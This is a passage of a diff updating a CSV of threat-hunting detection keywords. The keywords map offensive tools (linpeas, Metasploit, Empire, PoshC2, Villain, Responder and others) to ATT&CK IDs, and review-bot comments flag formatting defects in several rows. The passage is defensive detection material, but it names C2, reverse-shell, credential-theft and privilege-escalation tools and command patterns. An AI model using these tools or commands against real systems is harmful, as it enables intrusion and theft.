- T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_darwin_arm64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege 
Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_386*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_arm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - 
TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linux_hostrecon*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*linux_hostrecon.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*linux_sudo_cve-2017-1000367.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*linux-exploit-suggester*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*linux-exploit-suggester*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*linux-exploit-suggester.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*linuxprivchecker*","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1344","483","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" -"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*linux-rds-exploit.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*linux-smart-enumeration.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*LiquidSnake.exe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" -"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*List_Privileges /Process:powershell*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*list_tcppivot*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*list_tokens -u*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" 
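Review bot: The keyword `*LinEnum-master.ip*` on the re-added LinEnum row looks like a truncated `.zip`; as written it would presumably not match a `LinEnum-master.zip` archive of the repository's master branch, so the row may never fire on a proxy or endpoint log. If `.zip` was intended, the fix is one field: `"*LinEnum-master.zip*"`. The `*linux_trap_command.py*` row touched in the same hunk lists its techniques space-separated (`T1587 T1570 T1021 T1072 T1550`) with tactics `N/A`, while the other rows in this hunk use ` - ` as the delimiter, so a consumer splitting on ` - ` would read it as one unknown technique id. Writing it as `"T1587 - T1570 - T1021 - T1072 - T1550"` would keep the column parseable the same way everywhere.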
@@ -13152,7 +13309,7 @@ "*ListDomainGroupsLocalAdmin*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listen(58082* '0.0.0.0'*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*listen_http 0.0.0.0 8080 *.php operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" -"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ListNeverLoggedInAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListPasswordNeverExpire*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersLastPasswordChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD 
enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" 
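Review bot: The re-added `*ListMetasploitPayloads*` row still has two defects in its list fields: `T1106` appears twice in the technique list (mid-list and again as the final entry, `T1102.002 - T1106`), and the threat-group list ends with a dangling separator, `Turla - `. A consumer that splits these fields on ` - ` to build ATT&CK or actor lookups will get a duplicate technique and an empty or whitespace-only group name. Since this refresh rewrites the row anyway, I would drop the trailing `T1106` and end the group list at `Turla`. The `*LLMNRSpoofer*` row in the next hunk has the same two issues.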
@@ -13167,8 +13324,8 @@ "*lkarlslund/Adalanche*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*llehsrewop*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-llmnr -spn '*cifs* -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & 